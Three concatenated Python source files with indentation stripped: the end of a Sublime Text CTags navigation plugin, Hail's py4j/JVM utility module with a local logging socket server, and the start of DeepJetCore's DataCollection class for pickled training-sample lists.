self.remove()
set_on_load()
# else just proceed (file was likely open already in another tab)
else:
wrapped()
return wrapper
def find_tags_relative_to(path, tag_file):
"""
Find the tagfile relative to a file path.
:param path: path to a file
:param tag_file: name of tag file
:returns: path of deepest tag file with name of ``tag_file``
"""
if not path:
return None
dirs = os.path.dirname(os.path.normpath(path)).split(os.path.sep)
while dirs:
joined = os.path.sep.join(dirs + [tag_file])
if os.path.exists(joined) and not os.path.isdir(joined):
return joined
else:
dirs.pop()
return None
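# For example, with a (made-up) project laid out as
#   /home/me/project/tags
#   /home/me/project/src/module/foo.py
# walking up from the source file finds the deepest tag file:
#   find_tags_relative_to('/home/me/project/src/module/foo.py', 'tags')
#   # -> '/home/me/project/tags'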
def get_alternate_tags_paths(view, tags_file):
"""
Search for additional tag files.
    Search for additional tag files to use, including those defined by a
``search_paths`` file, the ``extra_tag_path`` setting and the
``extra_tag_files`` setting. This is mostly used for including library tag
files.
:param view: sublime text view
:param tags_file: path to a tag file
:returns: list of valid, existing paths to additional tag files to search
"""
tags_paths = '%s_search_paths' % tags_file
search_paths = [tags_file]
# read and add additional tag file paths from file
if os.path.exists(tags_paths):
search_paths.extend(
codecs.open(tags_paths, encoding='utf-8').read().split('\n'))
# read and add additional tag file paths from 'extra_tag_paths' setting
try:
for (selector, platform), path in setting('extra_tag_paths'):
if view.match_selector(view.sel()[0].begin(), selector):
if sublime.platform() == platform:
search_paths.append(
os.path.join(
path, setting('tag_file')))
except Exception as e:
print(e)
if os.path.exists(tags_paths):
for extrafile in setting('extra_tag_files'):
search_paths.append(
os.path.normpath(
os.path.join(os.path.dirname(tags_file), extrafile)))
# ok, didn't find the tags file under the viewed file.
# let's look in the currently opened folder
for folder in view.window().folders():
search_paths.append(
os.path.normpath(
os.path.join(folder, setting('tag_file'))))
for extrafile in setting('extra_tag_files'):
search_paths.append(
os.path.normpath(
os.path.join(folder, extrafile)))
    # use a list instead of a set to keep the order
ret = []
for path in search_paths:
if path and (path not in ret) and os.path.exists(path):
ret.append(path)
return ret
def get_common_ancestor_folder(path, folders):
"""
Get common ancestor for a file and a list of folders.
:param path: path to file
:param folders: list of folder paths
    :returns: path to the common ancestor of the file and the folders
"""
old_path = '' # must initialise to nothing due to lack of do...while
path = os.path.dirname(path)
while path != old_path: # prevent continuing past root directory
matches = [path for x in folders if x.startswith(path)]
if matches:
return max(matches) # in case of multiple matches, return closest
old_path = path
path = os.path.dirname(path) # go up one level
return path # return the root directory
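# For example, with (made-up) open folders ['/home/me/proj/lib', '/home/me/proj/app']
# and path '/home/me/proj/app/views/page.py', the loop above stops at
# '/home/me/proj/app', the first ancestor of the file that prefixes an open folder.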
# Scrolling functions
def find_with_scope(view, pattern, scope, start_pos=0, cond=True, flags=0):
max_pos = view.size()
while start_pos < max_pos:
estrs = pattern.split(r'\ufffd')
        if len(estrs) > 1:
pattern = estrs[0]
f = view.find(pattern, start_pos, flags)
if not f or view.match_selector(f.begin(), scope) is cond:
break
else:
start_pos = f.end()
return f
def find_source(view, pattern, start_at, flags=sublime.LITERAL):
return find_with_scope(view, pattern, 'string',
start_at, False, flags)
def follow_tag_path(view, tag_path, pattern):
regions = [sublime.Region(0, 0)]
for p in list(tag_path)[1:-1]:
while True: # .end() is BUG!
regions.append(find_source(view, p, regions[-1].begin()))
if ((regions[-1] in (None, regions[-2]) or
view.match_selector(regions[-1].begin(), ENTITY_SCOPE))):
regions = [r for r in regions if r is not None]
break
start_at = max(regions, key=lambda r: r.begin()).begin() - 1
# find the ex_command pattern
pattern_region = find_source(
view, '^' + escape_regex(pattern) + '$', start_at, flags=0)
if setting('debug'): # leave a visual trail for easy debugging
regions = regions + ([pattern_region] if pattern_region else [])
view.erase_regions('tag_path')
view.add_regions('tag_path', regions, 'comment', '', 1)
return pattern_region.begin() - 1 if pattern_region else None
def scroll_to_tag(view, tag, hook=None):
@on_load(os.path.join(tag.root_dir, tag.filename))
def and_then(view):
do_find = True
if tag.ex_command.isdigit():
look_from = view.text_point(int(tag.ex_command) - 1, 0)
else:
look_from = follow_tag_path(view, tag.tag_path, tag.ex_command)
if not look_from:
do_find = False
if do_find:
search_symbol = tag.get('def_symbol', tag.symbol)
symbol_region = view.find(
escape_regex(search_symbol) + r"(?:[^_]|$)", look_from, 0)
if do_find and symbol_region:
# Using reversed symbol_region so cursor stays in front of the
# symbol. - 1 to discard the additional regex part.
select_region = sublime.Region(
symbol_region.end() - 1, symbol_region.begin())
select(view, select_region)
if not setting('select_searched_symbol'):
view.run_command('exit_visual_mode')
else:
status_message('Can\'t find "%s"' % tag.symbol)
if hook:
hook(view)
# Formatting helper functions
def format_tag_for_quickopen(tag, show_path=True):
"""
Format a tag for use in quickopen panel.
:param tag: tag to display in quickopen
:param show_path: show path to file containing tag in quickopen
:returns: formatted tag
"""
format_ = []
tag = ctags.TagElements(tag)
f = ''
for field in getattr(tag, 'field_keys', []):
if field in PATH_ORDER:
punct = OBJECT_PUNCTUATORS.get(field, ' -> ')
f += string.Template(
' %($field)s$punct%(symbol)s').substitute(locals())
format_ = [f % tag if f else tag.symbol, tag.ex_command]
format_[1] = format_[1].strip()
if show_path:
format_.insert(1, tag.filename)
return format_
def prepare_for_quickpanel(formatter=format_tag_for_quickopen):
"""
Prepare list of matching ctags for the quickpanel.
:param formatter: formatter function to apply to tag
:returns: tuple containing tag and formatted string representation of tag
"""
def compile_lists(sorter):
args, display = [], []
for t in sorter():
display.append(formatter(t))
args.append(t)
return args, display
return compile_lists
# File collection helper functions
def get_rel_path_to_source(path, tag_file, multiple=True):
"""
Get relative path from tag_file to source file.
:param path: path to a source file
:param tag_file: path to a tag file
:param multiple: if multiple tag files open
:returns: list containing relative path from tag_file to source file
"""
if multiple:
return []
tag_dir = os.path.dirname(tag_file) # get tag directory
common_prefix = os.path.commonprefix([tag_dir, path])
relative_path = os.path.relpath(path, common_prefix)
return [relative_path]
def get_current_file_suffix(path):
"""
Get file extension
:param path: path to a source file
:returns: file extension for file
"""
_, file_suffix = os.path.splitext(path)
return file_suffix
#
# Sublime Commands
#
# JumpPrev Commands
class JumpPrev(sublime_plugin.WindowCommand):
"""
Provide ``jump_back`` command.
Command "jumps back" to the previous code point before a tag was navigated
or "jumped" to.
This is functionality supported natively by ST3 but not by ST2. It is
therefore included for legacy purposes.
"""
buf = deque(maxlen=100) # virtually a "ring buffer"
def is_enabled(self):
# disable if nothing in the buffer
return len(self.buf) > 0
def is_visible(self):
return setting('show_context_menus')
def run(self):
if not self.buf:
return status_message('JumpPrev buffer empty')
file_name, sel = self.buf.pop()
self.jump(file_name, sel)
def jump(self, path, sel):
@on_load(path, begin_edit=True)
def and_then(view):
select(view, sel)
@classmethod
def append(cls, view):
"""Append a code point to the list"""
name = view.file_name()
if name:
sel = [s for s in view.sel()][0]
cls.buf.append((name, sel))
# CTags commands
def show_build_panel(view):
"""
Handle build ctags command.
Allows user to select whether tags should be built for the current file,
a given directory or all open directories.
"""
display = []
if view.file_name() is not None:
if not setting('recursive'):
display.append(['Open File', view.file_name()])
else:
display.append([
'Open File\'s Directory', os.path.dirname(view.file_name())])
if len(view.window().folders()) > 0:
# append option to build for all open folders
display.append(
['All Open Folders', '; '.join(
['\'{0}\''.format(os.path.split(x)[1])
for x in view.window().folders()])])
# Append options to build for each open folder
display.extend(
[[os.path.split(x)[1], x] for x in view.window().folders()])
def on_select(i):
if i != -1:
if display[i][0] == 'All Open Folders':
paths = view.window().folders()
else:
paths = display[i][1:]
command = setting('command')
recursive = setting('recursive')
tag_file = setting('tag_file')
opts = setting('opts')
rebuild_tags = RebuildTags(False)
rebuild_tags.build_ctags(paths, command, tag_file, recursive, opts)
view.window().show_quick_panel(display, on_select)
def show_tag_panel(view, result, jump_directly):
"""
Handle tag navigation command.
Jump directly to a tag entry, or show a quick panel with a list of
matching tags
"""
if result not in (True, False, None):
args, display = result
if not args:
return
def on_select(i):
if i != -1:
JumpPrev.append(view)
# Work around bug in ST3 where the quick panel keeps focus after
# selecting an entry.
# See https://github.com/SublimeText/Issues/issues/39
view.window().run_command('hide_overlay')
scroll_to_tag(view, args[i])
if jump_directly and len(args) == 1:
on_select(0)
else:
view.window().show_quick_panel(display, on_select)
def ctags_goto_command(jump_directly=False):
"""
    Decorator to go to a ctags entry.
    Allows jumping to a ctags entry, directly or otherwise.
"""
def wrapper(func):
def command(self, edit, **args):
view = self.view
tags_file = find_tags_relative_to(
view.file_name(), setting('tag_file'))
if not tags_file:
status_message('Can\'t find any relevant tags file')
return
result = func(self, self.view, args, tags_file)
show_tag_panel(self.view, result, jump_directly)
return command
return wrapper
def check_if_building(self, **args):
"""
Check if ctags are currently being built.
"""
if RebuildTags.build_ctags.func.running:
status_message('Tags not available until built')
if setting('display_rebuilding_message'):
error_message('Please wait while tags are built')
return False
return True
# Goto definition under cursor commands
class JumpToDefinition:
"""
Provider for NavigateToDefinition and SearchForDefinition commands.
"""
@staticmethod
def run(symbol, region, sym_line, mbrParts, view, tags_file):
# print('JumpToDefinition')
tags = {}
for tags_file in get_alternate_tags_paths(view, tags_file):
with TagFile(tags_file, SYMBOL) as tagfile:
tags = tagfile.get_tags_dict(
symbol, filters=compile_filters(view))
if tags:
break
if not tags:
return status_message('Can\'t find "%s"' % symbol)
rankmgr = RankMgr(region, mbrParts, view, symbol, sym_line)
@prepare_for_quickpanel()
def sorted_tags():
taglist = tags.get(symbol, [])
p_tags = rankmgr.sort_tags(taglist)
if not p_tags:
status_message('Can\'t find "%s"' % symbol)
return p_tags
return sorted_tags
class NavigateToDefinition(sublime_plugin.TextCommand):
"""
Provider for the ``navigate_to_definition`` command.
Command navigates to the definition for a symbol in the open file(s) or
folder(s).
"""
is_enabled = check_if_building
def __init__(self, args):
sublime_plugin.TextCommand.__init__(self, args)
self.endings = re.compile(RUBY_SPECIAL_ENDINGS)
def is_visible(self):
return setting('show_context_menus')
@ctags_goto_command(jump_directly=True)
def run(self, view, args, tags_file):
region = view.sel()[0]
if region.begin() == region.end(): # point
region = view.word(region)
# handle special line endings for Ruby
language = view.settings().get('syntax')
endings = view.substr(
sublime.Region(
region.end(),
region.end() + 1))
if 'Ruby' in language and self.endings.match(endings):
region = sublime.Region(region.begin(), region.end() + 1)
symbol = view.substr(region)
sym_line = view.substr(view.line(region))
(row, col) = view.rowcol(region.begin())
line_to_symbol = sym_line[:col]
#print ("line_to_symbol %s" % line_to_symbol)
source = get_source(view)
arrMbrParts = Parser.extract_member_exp(line_to_symbol, source)
return JumpToDefinition.run(
symbol,
region,
sym_line,
arrMbrParts,
view,
tags_file)
class SearchForDefinition(sublime_plugin.WindowCommand):
"""
Provider for the ``search_for_definition`` command.
Command searches for definition for a symbol in the open file(s) or
folder(s).
"""
is_enabled = check_if_building
def is_visible(self):
return setting('show_context_menus')
def run(self):
self.window.show_input_panel(
'', '', self.on_done, self.on_change, self.on_cancel)
def on_done(self, symbol):
view = self.window.active_view()
tags_file = find_tags_relative_to(
view.file_name(), setting('tag_file'))
if not tags_file:
status_message('Can\'t find any relevant tags file')
return
result = JumpToDefinition.run(symbol, None, "", [], view, tags_file)
show_tag_panel(view, result, True)
def on_change(self, text):
pass
def on_cancel(self):
pass
# Show Symbol commands
tags_cache = defaultdict(dict)
class ShowSymbols(sublime_plugin.TextCommand):
"""
Provider for the ``show_symbols`` command.
Command shows all symbols for the open file(s) or folder(s).
"""
is_enabled = check_if_building
def is_visible(self):
return setting('show_context_menus')
@ctags_goto_command()
def run(self, view, args, tags_file):
if not tags_file:
return
multi = args.get('type') == 'multi'
lang = args.get('type') == 'lang'
if view.file_name():
files = get_rel_path_to_source(
view.file_name(), tags_file, multi)
if lang:
suffix = get_current_file_suffix(view.file_name())
key = suffix
else:
key = ','.join(files)
tags_file = tags_file + '_sorted_by_file'
base_path = get_common_ancestor_folder(
view.file_name(), view.window().folders())
def get_tags():
with TagFile(tags_file, FILENAME) as tagfile:
if lang:
return tagfile.get_tags_dict_by_suffix(
suffix, filters=compile_filters(view))
elif multi:
return tagfile.get_tags_dict(
filters=compile_filters(view))
else:
return tagfile.get_tags_dict(
*files, filters=compile_filters(view))
if key in tags_cache[base_path]:
print('loading symbols from cache')
tags = tags_cache[base_path][key]
else:
print('loading symbols from file')
tags = get_tags()
tags_cache[base_path][key] = tags
print(('loaded [%d] symbols' % len(tags)))
if not tags:
if multi:
sublime.status_message(
'No symbols found **FOR CURRENT FOLDERS**; Try Rebuild?')
else:
sublime.status_message(
'No symbols found **FOR CURRENT FILE**; Try Rebuild?')
path_cols = (0, ) if len(files) > 1 or multi else ()
formatting = functools.partial(
format_tag_for_quickopen, show_path=bool(path_cols))
@prepare_for_quickpanel(formatting)
def sorted_tags():
return sorted(
chain(*(tags[k] for k in tags)), key=iget('tag_path'))
return sorted_tags
# Rebuild CTags commands
class RebuildTags(sublime_plugin.TextCommand):
"""
Provider for the ``rebuild_tags`` command.
Command (re)builds tag files for the open file(s) or folder(s), reading
relevant settings from the settings file.
"""
def run(self, edit, **args):
"""Handler for ``rebuild_tags`` command"""
paths = []
command = setting('command')
recursive = setting('recursive')
opts = setting('opts')
tag_file = setting('tag_file')
if 'dirs' in args and args['dirs']:
paths.extend(args['dirs'])
self.build_ctags(paths, command, tag_file, recursive, opts)
elif 'files' in args and args['files']:
paths.extend(args['files'])
# build ctags and ignore recursive flag - we clearly only want
# to build them for a file
self.build_ctags(paths, command, tag_file, False, opts)
elif (self.view.file_name() is None and
len(self.view.window().folders()) <= 0):
status_message('Cannot build CTags: No file or folder open.')
return
else:
show_build_panel(self.view)
@threaded(msg='Already running CTags!')
def build_ctags(self, paths, command, tag_file, recursive, opts):
"""
Build tags for the open file or folder(s).
:param paths: paths to build ctags for
:param command: ctags command
:param tag_file: filename to use for the tag file. Defaults to ``tags``
:param recursive: specify if search should be recursive in directory
given by path. This overrides filename specified by ``path``
:param opts: list of additional parameters to pass to the ``ctags``
executable
:returns: None
"""
def tags_building(tag_file):
"""Display 'Building CTags' message in all views"""
print(('Building CTags for %s: Please be patient' % tag_file))
in_main(lambda: status_message('Building CTags for {0}: Please be'
' patient'.format(tag_file)))()
def tags_built(tag_file):
"""Display 'Finished Building CTags' message in all views"""
print(('Finished building %s' % tag_file))
in_main(lambda: status_message('Finished building {0}'
.format(tag_file)))()
in_main(lambda: tags_cache[os.path.dirname(tag_file)].clear())()
for path in paths:
tags_building(path)
try:
result = ctags.build_ctags(path=path, tag_file=tag_file,
recursive=recursive, opts=opts,
cmd=command)
except IOError as e:
error_message(e.strerror)
return
except subprocess.CalledProcessError as e:
if sublime.platform() == 'windows':
str_err = ' '.join(
e.output.decode('windows-1252').splitlines())
else:
str_err = e.output.decode(
locale.getpreferredencoding()).rstrip()
error_message(str_err)
return
except Exception as e:
error_message(
"An unknown error occured.\nCheck the console for info.")
raise e
tags_built(result)
GetAllCTagsList.ctags_list = [] # clear the cached ctags list
# Autocomplete commands
class GetAllCTagsList():
"""
Cache all the ctags list.
"""
ctags_list = []
def __init__(self, list):
self.ctags_list = list
class CTagsAutoComplete(sublime_plugin.EventListener):
def on_query_completions(self, view, prefix, locations):
if setting('autocomplete'):
prefix = prefix.strip().lower()
tags_path = view.window().folders()[0] + '/' + setting('tag_file')
sub_results = [v.extract_completions(prefix)
for v in sublime.active_window().views()]
sub_results = [(item, item) for sublist in sub_results
for item in sublist] # flatten
if GetAllCTagsList.ctags_list:
results = [sublist for sublist in GetAllCTagsList.ctags_list
if sublist[0].lower().startswith(prefix)]
results = sorted(set(results).union(set(sub_results)))
return results
else:
tags = []
# check if a project is open and the tags file exists
if not (view.window().folders() and os.path.exists(tags_path)):
return tags
if sublime.platform() == "windows":
prefix = ""
else:
prefix = "\\"
f = os.popen(
"awk \"{ print " + prefix + "$1 }\" \"" + tags_path + "\"")
for i in f.readlines():
tags.append([i.strip()])
tags = [(item, item) for sublist in tags
for item in sublist] # flatten
tags = sorted(set(tags)) # make unique
GetAllCTagsList.ctags_list = tags
results = [sublist for sublist in GetAllCTagsList.ctags_list
if sublist[0].lower().startswith(prefix)]
results = sorted(set(results).union(set(sub_results)))
return results
# Test CTags commands
class TestCtags(sublime_plugin.TextCommand):
routine = None
def run(self, edit, **args):
if self.routine is None:
self.routine = self.co_routine(self.view)
next(self.routine)
def __next__(self):
try:
next(self.routine)
except Exception as e:
print(e)
self.routine = None
def co_routine(self, view):
tag_file = find_tags_relative_to(
view.file_name(), setting('tag_file'))
with codecs.open(tag_file, encoding='utf-8') as tf:
tags = parse_tag_lines(tf, tag_class=TagElements)
print('Starting Test')
ex_failures = []
line_failures = []
for symbol, tag_list in list(tags.items()):
for tag in tag_list:
tag.root_dir = os.path.dirname(tag_file)
def hook(av):
test_context = av.sel()[0]
if tag.ex_command.isdigit():
test_string = tag.symbol
else:
test_string = tag.ex_command
test_context = av.line(test_context)
if not av.substr(test_context).startswith(test_string):
failure = 'FAILURE %s' % pprint.pformat(tag)
failure += av.file_name()
if setting('debug'):
if not sublime.question_box('%s\n\n\n' % failure):
self.routine = None
return sublime.set_clipboard(failure)
ex_failures.append(tag)
sublime.set_timeout(self.__next__, 5)
scroll_to_tag(view, tag, hook)
yield
failures = line_failures + ex_failures
tags_tested = sum(len(v) for v in list(tags.values())) - len(failures)
view = sublime.active_window().new_file()
with Edit(view) as edit:
edit.insert(view.size(), '%s Tags Tested OK\n' % tags_tested)
edit.insert(view.size(), '%s Tags Failed' % len(failures))
view.set_scratch(True)
view.set_name('CTags Test Results')
if failures:
sublime.set_clipboard(pprint.pformat(failures))
|
java.py
|
import json
import socketserver
import socket
import sys
import re
from threading import Thread
import py4j
import hail
class FatalError(Exception):
""":class:`.FatalError` is an error thrown by Hail method failures"""
class Env:
_jvm = None
_gateway = None
_hail_package = None
_jutils = None
_hc = None
_counter = 0
_seed_generator = None
@staticmethod
def get_uid():
Env._counter += 1
return "__uid_{}".format(Env._counter)
@staticmethod
def jvm():
if not Env._jvm:
Env.hc()
assert Env._jvm is not None
return Env._jvm
@staticmethod
def hail():
if not Env._hail_package:
Env._hail_package = getattr(Env.jvm(), 'is').hail
return Env._hail_package
@staticmethod
def gateway():
if not Env._gateway:
Env.hc()
assert Env._gateway is not None
return Env._gateway
@staticmethod
def jutils():
if not Env._jutils:
Env._jutils = scala_package_object(Env.hail().utils)
return Env._jutils
@staticmethod
def hc():
if not Env._hc:
from hail.context import init
import sys
sys.stderr.write("Initializing Spark and Hail with default parameters...\n")
init()
assert Env._hc is not None
return Env._hc
@staticmethod
def backend():
return Env.hc()._backend
@staticmethod
def spark_backend(op):
b = Env.backend()
if isinstance(b, hail.backend.SparkBackend):
return b
else:
raise NotImplementedError(
f"{b.__class__.__name__} doesn't support {op}, only SparkBackend")
@staticmethod
def fs():
return Env.backend().fs
@staticmethod
def spark_session():
return Env.hc()._spark_session
_dummy_table = None
@staticmethod
def dummy_table():
if Env._dummy_table is None:
import hail
Env._dummy_table = hail.utils.range_table(1, 1).key_by().cache()
return Env._dummy_table
@staticmethod
def set_seed(seed):
Env._seed_generator = hail.utils.HailSeedGenerator(seed)
@staticmethod
def next_seed():
if Env._seed_generator is None:
Env.set_seed(None)
return Env._seed_generator.next_seed()
def jarray(jtype, lst):
jarr = Env.gateway().new_array(jtype, len(lst))
for i, s in enumerate(lst):
jarr[i] = s
return jarr
def scala_object(jpackage, name):
return getattr(getattr(jpackage, name + '$'), 'MODULE$')
def scala_package_object(jpackage):
return scala_object(jpackage, 'package')
def jnone():
return scala_object(Env.jvm().scala, 'None')
def jsome(x):
return Env.jvm().scala.Some(x)
def joption(x):
return jsome(x) if x else jnone()
def from_option(x):
return x.get() if x.isDefined() else None
def jindexed_seq(x):
return Env.jutils().arrayListToISeq(x)
def jset(x):
return Env.jutils().arrayListToSet(x)
def jindexed_seq_args(x):
args = [x] if isinstance(x, str) else x
return jindexed_seq(args)
def jset_args(x):
args = [x] if isinstance(x, str) else x
return jset(args)
def jiterable_to_list(it):
if it is not None:
return list(Env.jutils().iterableToArrayList(it))
else:
return None
_parsable_str = re.compile(r'[\w_]+')
def escape_parsable(s):
if _parsable_str.fullmatch(s):
return s
else:
return '`' + s.encode('unicode_escape').decode('utf-8').replace('`', '\\`') + '`'
def unescape_parsable(s):
return bytes(s.replace('\\`', '`'), 'utf-8').decode('unicode_escape')
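# Quick illustration of the escaping rules above; the helper below is a hypothetical
# example and uses only the pure functions in this module, so no JVM is required.
def _escape_parsable_examples():
    assert escape_parsable('foo_bar') == 'foo_bar'   # already a plain identifier
    assert escape_parsable('a b') == '`a b`'         # non-word chars get backtick-quoted
    assert unescape_parsable('a\\`b') == 'a`b'       # escaped backtick restored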
def jarray_to_list(a):
return list(a) if a else None
class Log4jLogger:
log_pkg = None
@staticmethod
def get():
if Log4jLogger.log_pkg is None:
Log4jLogger.log_pkg = Env.jutils()
return Log4jLogger.log_pkg
def error(msg):
Log4jLogger.get().error(msg)
def warn(msg):
Log4jLogger.get().warn(msg)
def info(msg):
Log4jLogger.get().info(msg)
def handle_java_exception(f):
def deco(*args, **kwargs):
import pyspark
try:
return f(*args, **kwargs)
except py4j.protocol.Py4JJavaError as e:
s = e.java_exception.toString()
# py4j catches NoSuchElementExceptions to stop array iteration
if s.startswith('java.util.NoSuchElementException'):
raise
tpl = Env.jutils().handleForPython(e.java_exception)
deepest, full = tpl._1(), tpl._2()
raise FatalError('%s\n\nJava stack trace:\n%s\n'
'Hail version: %s\n'
'Error summary: %s' % (deepest, full, hail.__version__, deepest)) from None
except pyspark.sql.utils.CapturedException as e:
raise FatalError('%s\n\nJava stack trace:\n%s\n'
'Hail version: %s\n'
'Error summary: %s' % (e.desc, e.stackTrace, hail.__version__, e.desc)) from None
return deco
_installed = False
_original = None
def install_exception_handler():
global _installed
global _original
if not _installed:
_original = py4j.protocol.get_return_value
_installed = True
# The original `get_return_value` is not patched, it's idempotent.
patched = handle_java_exception(_original)
# only patch the one used in py4j.java_gateway (call Java API)
py4j.java_gateway.get_return_value = patched
def uninstall_exception_handler():
global _installed
global _original
if _installed:
_installed = False
py4j.protocol.get_return_value = _original
class LoggingTCPHandler(socketserver.StreamRequestHandler):
def handle(self):
for line in self.rfile:
sys.stderr.write(line.decode("ISO-8859-1"))
class SimpleServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
daemon_threads = True
allow_reuse_address = True
def __init__(self, server_address, handler_class):
socketserver.TCPServer.__init__(self, server_address, handler_class)
def connect_logger(host, port):
"""
This method starts a simple server which listens on a port for a
client to connect and start writing messages. Whenever a message
is received, it is written to sys.stderr. The server is run in
a daemon thread from the caller, which is killed when the caller
thread dies.
If the socket is in use, then the server tries to listen on the
next port (port + 1). After 25 tries, it gives up.
:param str host: Hostname for server.
:param int port: Port to listen on.
"""
server = None
tries = 0
max_tries = 25
while not server:
try:
server = SimpleServer((host, port), LoggingTCPHandler)
except socket.error:
port += 1
tries += 1
if tries >= max_tries:
sys.stderr.write(
'WARNING: Could not find a free port for logger, maximum retries {} exceeded.'.format(max_tries))
return
t = Thread(target=server.serve_forever, args=())
# The thread should be a daemon so that it shuts down when the parent thread is killed
t.daemon = True
t.start()
Env.jutils().addSocketAppender(host, port)
|
DataCollection.py
|
'''
Created on 21 Feb 2017
@author: jkiesele
'''
from DeepJetCore.TrainData import TrainData
from DeepJetCore.dataPipeline import TrainDataGenerator
import tempfile
import pickle
import shutil
import os
import copy
import time
import logging
from DeepJetCore.stopwatch import stopwatch
logger = logging.getLogger(__name__)
class DataCollection(object):
'''
classdocs
'''
def __init__(self, infile = None, nprocs = -1):
'''
Constructor
'''
self.clear()
self.istestdata=False
self.batch_uses_sum_of_squares=False
self.gen = None
self.__batchsize=1
self.optionsdict={}
self.weighterobjects={}
self.batch_mode = False
self.nprocs=-1
self.no_copy_on_convert=True
if infile:
self.readFromFile(infile)
if not len(self.samples):
raise Exception("no valid datacollection found in "+infile)
def setDataClass(self, dataclass):
self.dataclass = dataclass
self.dataclass_instance = self.dataclass()
def clear(self):
self.samples=[]
self.sourceList=[]
self.dataDir=""
self.dataclass = TrainData
self.dataclass_instance = self.dataclass()
self.__nsamples = 0
def __iadd__(self, other):
'A += B'
if not isinstance(other, DataCollection):
raise ValueError("I don't know how to add DataCollection and %s" % type(other))
def _extend_(a, b, name):
getattr(a, name).extend(getattr(b, name))
_extend_(self, other, 'samples')
if len(set(self.samples)) != len(self.samples):
raise ValueError('The two DataCollections being summed contain the same files!')
_extend_(self, other, 'sourceList')
if self.dataDir != other.dataDir:
raise ValueError('The two DataCollections have different data directories, still to be implemented!')
#if type(self.dataclass) != type(other.dataclass):
# raise ValueError(
# 'The two DataCollections were made with a'
# ' different data class type! (%s, and %s)' % (type(self.dataclass), type(other.dataclass))
# )
return self
def __add__(self, other):
'A+B'
if not isinstance(other, DataCollection):
raise ValueError("I don't know how to add DataCollection and %s" % type(other))
ret = copy.deepcopy(self)
ret += other
return ret
def __radd__(self, other):
'B+A to work with sum'
if other == 0:
return copy.deepcopy(self)
elif isinstance(other, DataCollection):
return self + other #we use the __add__ method
else:
raise ValueError("I don't know how to add DataCollection and %s" % type(other))
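    # Supporting __radd__ for the integer 0 lets the built-in sum() merge collections,
    # e.g. (hypothetical names): merged = sum([dc_a, dc_b, dc_c])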
def __len__(self):
return len(self.samples)
def _readMetaInfoIfNeeded(self):
if len(self.samples)<1:
return
if self.dataclass_instance is None:
self.dataclass_instance = self.dataclass()
if self.dataclass_instance.nElements() < 1:
self.dataclass_instance.readMetaDataFromFile(self.getSamplePath(self.samples[0]))
def _readNTotal(self):
if not len(self.samples):
return 0
        gen = TrainDataGenerator()
gen.setFileList([self.dataDir+"/"+s for s in self.samples])
return gen.getNTotal()
def removeLast(self):
self.samples.pop()
self.sourceList.pop()
def getNumpyFeatureShapes(self):
        if len(self.samples)<1:
            raise Exception("DataCollection.getNumpyFeatureShapes: no files")
self._readMetaInfoIfNeeded()
return self.dataclass_instance.getNumpyFeatureShapes()
def getNumpyFeatureDTypes(self):
        if len(self.samples)<1:
            raise Exception("DataCollection.getNumpyFeatureDTypes: no files")
self._readMetaInfoIfNeeded()
return self.dataclass_instance.getNumpyFeatureDTypes()
def getNumpyFeatureArrayNames(self):
        if len(self.samples)<1:
            raise Exception("DataCollection.getNumpyFeatureArrayNames: no files")
self._readMetaInfoIfNeeded()
return self.dataclass_instance.getNumpyFeatureArrayNames()
def getKerasFeatureDTypes(self):
print('DataCollection.getKerasFeatureDTypes: deprecation warning, use getNumpyFeatureArrayNames')
return self.getNumpyFeatureDTypes()
def getKerasFeatureShapes(self):
print('DataCollection.getKerasFeatureShapes: deprecation warning, use getNumpyFeatureArrayNames')
return self.getNumpyFeatureShapes()
def getKerasFeatureArrayNames(self):
print('DataCollection.getKerasFeatureArrayNames: deprecation warning, use getNumpyFeatureArrayNames')
return self.getNumpyFeatureArrayNames()
def getInputShapes(self):
print('DataCollection:getInputShapes deprecated, use getNumpyFeatureShapes ')
return self.getNumpyFeatureShapes()
def setBatchSize(self,bsize):
self.__batchsize=bsize
def getBatchSize(self):
return self.__batchsize
def validate(self, remove=True, skip_first=0):
'''
checks if all samples in the collection can be read properly.
removes the invalid samples from the sample list.
Also removes the original link to the root file, so recover cannot be run
(this might be changed in future implementations)
'''
validsourcelist = len(self.samples) == len(self.sourceList)
newsamples=[]
newsources=[]
for i in range(len(self.samples)):
if i < skip_first: continue
td = self.dataclass ()
fullpath=self.getSamplePath(self.samples[i])
print('reading '+fullpath, str(i), '/', str(len(self.samples)))
try:
td.readFromFile(fullpath)
if hasattr(td, "isValid"):
if not td.isValid():
raise Exception("data validation failed for "+fullpath)
if td.nElements() < 1:
print("warning, no data in file "+fullpath)
del td
newsamples.append(self.samples[i])
if validsourcelist:
newsources.append(self.sourceList[i])
continue
            except Exception as e:
                print('problem with file, removing ', fullpath, ':', e)
        self.samples = newsamples
        self.sourceList = newsources
def removeEntry(self,relative_path_to_entry):
for i in range(len(self.samples)):
if relative_path_to_entry==self.samples[i]:
print('removing '+self.samples[i])
del self.samples[i]
del self.sourceList[i]
break
def writeToFile(self,filename):
with tempfile.NamedTemporaryFile(mode='wb', delete=False) as fd:
pickle.dump(self.samples, fd,protocol=0 )
pickle.dump(self.sourceList, fd,protocol=0 )
pickle.dump(self.dataclass, fd,protocol=0 )
pickle.dump(self.weighterobjects, fd, protocol=0)
pickle.dump(self.__batchsize, fd, protocol=0)
pickle.dump(self.batch_uses_sum_of_squares, fd, protocol=0)
pickle.dump(self.optionsdict, fd, protocol=0)
shutil.move(fd.name, filename)
os.chmod(filename, 0o644)
def readFromFile(self,filename):
fd=open(filename,'rb')
self.samples=pickle.load(fd)
self.sourceList=pickle.load(fd)
try:
self.dataclass=pickle.load(fd)
self.weighterobjects=pickle.load(fd)
self.__batchsize = pickle.load(fd)
self.batch_uses_sum_of_squares = pickle.load(fd)
self.optionsdict = pickle.load(fd)
except Exception as e:
print(e)
print("WARNING: wrong dataCollection format. Can still be used for training, but it is advised to recreate it: this is possible without converting the original data again using the script createDataCollectionFromTD.py (takes a few seconds)\nBookkeeping (e.g. for predict) will be broken unless data collection is updated to new format.")
finally:
fd.close()
self.dataDir=os.path.dirname(os.path.abspath(filename))
self.dataDir+='/'
def readSourceListFromFile(self, file, relpath='', checkfiles=False):
self.samples=[]
self.sourceList=[]
self.__nsamples=0
self.dataDir=""
td=self.dataclass()
fdir=os.path.dirname(file)
fdir=os.path.abspath(fdir)
fdir=os.path.realpath(fdir)
lines = [(line.rstrip('\n')).rstrip(' ') for line in open(file)]
for line in lines:
if len(line) < 1: continue
if relpath:
self.sourceList.append(os.path.join(relpath, line))
else:
self.sourceList.append(line)
if len(self.sourceList)<1:
raise Exception('source samples list empty')
if checkfiles:
print('DataCollection: checking files')
self.sourceList=self.checkSourceFiles()
